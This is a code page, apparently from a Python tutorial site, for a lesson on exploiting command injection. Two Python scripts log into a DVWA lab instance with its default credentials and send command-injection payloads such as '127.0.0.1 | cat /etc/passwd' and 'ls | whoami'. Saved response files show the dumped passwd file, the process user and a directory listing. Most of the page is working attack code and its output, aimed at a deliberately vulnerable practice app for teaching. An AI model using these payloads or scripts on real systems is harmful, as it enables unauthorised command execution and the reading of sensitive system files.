Movatterモバイル変換

[0]ホーム
URL:


Code forHow to Exploit Command Injection Vulnerabilities in Python Tutorial


View on Github

command_injection_scanner.py

# Import the necessary libraries.import requestsfrom urllib.parse import urljoin# Define the target URL and login credentials.target_url = "http://192.168.134.129/dvwa/"login_url = urljoin(target_url, "login.php")login_data = {    "username": "admin",    "password": "password",    "Login": "Login"}# Define the vulnerable page URL.vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")# Define the test payload.payload = "127.0.0.1 | cat /etc/passwd"def check_command_injection(base_url, login_url, login_data, vuln_page_url):    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")    # Authenticate with the application (DVWA).    session = requests.Session()    response = session.post(login_url, data=login_data)    if "Login failed" in response.text:        print("[-] Authentication failed. Please check the credentials.")        return    # Send the payload through the form.    form_data = {        "ip": payload,        "submit": "Submit"    }    try:        response = session.post(vuln_page_url, data=form_data)        print(f"[!] Payload used: {payload}")        print("[+] Response after command injection:\n")        print("=" * 80)        print(response.text)        print("=" * 80)        print("\n[!] Please inspect the response to determine if the parameter is vulnerable to command injection.\n")        # Write the response to a text file.        with open("response.txt", "w") as f:            f.write(response.text)        print("[+] Response written to response.txt")    except Exception as e:        print(f"[-] Error occurred while testing payload '{payload}': {e}")    print("[+] Command injection testing completed.\n")# Call the function with the required parameters.check_command_injection(target_url, login_url, login_data, vuln_page_url)

command_injection_scanner_auto.py

# Import the necessary libraries.import requestsfrom urllib.parse import urljoinfrom colorama import Fore, Style, init# Initialise colorama.init()# Define the target URL and login credentials.target_url = "http://192.168.134.129/dvwa/"login_url = urljoin(target_url, "login.php")login_data = {    "username": "admin",    "password": "password",    "Login": "Login"}# Define the vulnerable page URL.vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")# Define the test payloads.payloads = [    "ls | whoami",    "127.0.0.1 | cat /etc/passwd",    "127.0.0.1 | ls -la"]def check_command_injection(base_url, login_url, login_data, vuln_page_url, payloads):    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")    # Authenticate with the application.    session = requests.Session()    response = session.post(login_url, data=login_data)    if "Login failed" in response.text:        print("[-] Authentication failed. Please check the credentials.")        return    responses = ""    for payload in payloads:        # Send the payload through the form.        form_data = {            "ip": payload,            "submit": "Submit"        }        try:            response = session.post(vuln_page_url, data=form_data)            print(f"{Fore.GREEN}[!] Payload used: {payload}{Style.RESET_ALL}")            print("[+] Response after command injection:\n")            print("=" * 80)            print(response.text)            print("=" * 80)            print(f"\n{Fore.YELLOW}[!] Please manually inspect the response to determine if the parameter is vulnerable to command injection.{Style.RESET_ALL}\n")            responses += f"[!] Payload used: {payload}\n"            responses += "[+] Response after command injection:\n"            responses += "=" * 80 + "\n"            responses += response.text            responses += "=" * 80 + "\n\n"        except Exception as e:            print(f"{Fore.RED}[-] Error occurred while testing payload '{payload}': {e}{Style.RESET_ALL}")            responses += f"[-] Error occurred while testing payload '{payload}': {e}\n"    # Write the responses to a text file.    with open("multiple_payload_response.txt", "w") as f:        f.write(responses)    print("[+] Responses written to response.txt")    print("[+] Command injection testing completed.\n")# Call the function with the required parameters.check_command_injection(target_url, login_url, login_data, vuln_page_url, payloads)

response.txt

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></form><pre>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x:101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsepostgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser:x:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x:112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/nfs:/bin/false</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>

multiple_payload_response.txt

[!] Payload used: ls | whoami[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></form><pre>www-data</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================[!] Payload used: 127.0.0.1 | cat /etc/passwd[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></form><pre>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x:101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsepostgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser:x:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x:112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/nfs:/bin/false</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================[!] Payload used: 127.0.0.1 | ls -la[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></form><pre>total 20drwxr-xr-x  4 www-data www-data 4096 May 20  2012 .drwxr-xr-x 11 www-data www-data 4096 May 20  2012 ..drwxr-xr-x  2 www-data www-data 4096 May 20  2012 help-rw-r--r--  1 www-data www-data 1509 Mar 16  2010 index.phpdrwxr-xr-x  2 www-data www-data 4096 May 20  2012 source</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================

Practical Python PDF Processing EBook - Topic - Top


Join 50,000+ Python Programmers & Enthusiasts like you!



Tags

Practical Python PDF Processing EBook - Contact Us - Middle


New Tutorials

Popular Tutorials


Practical Python PDF Processing EBook - Abdou Author - Bottom






[8]ページ先頭
©2009-2025 Movatter.jp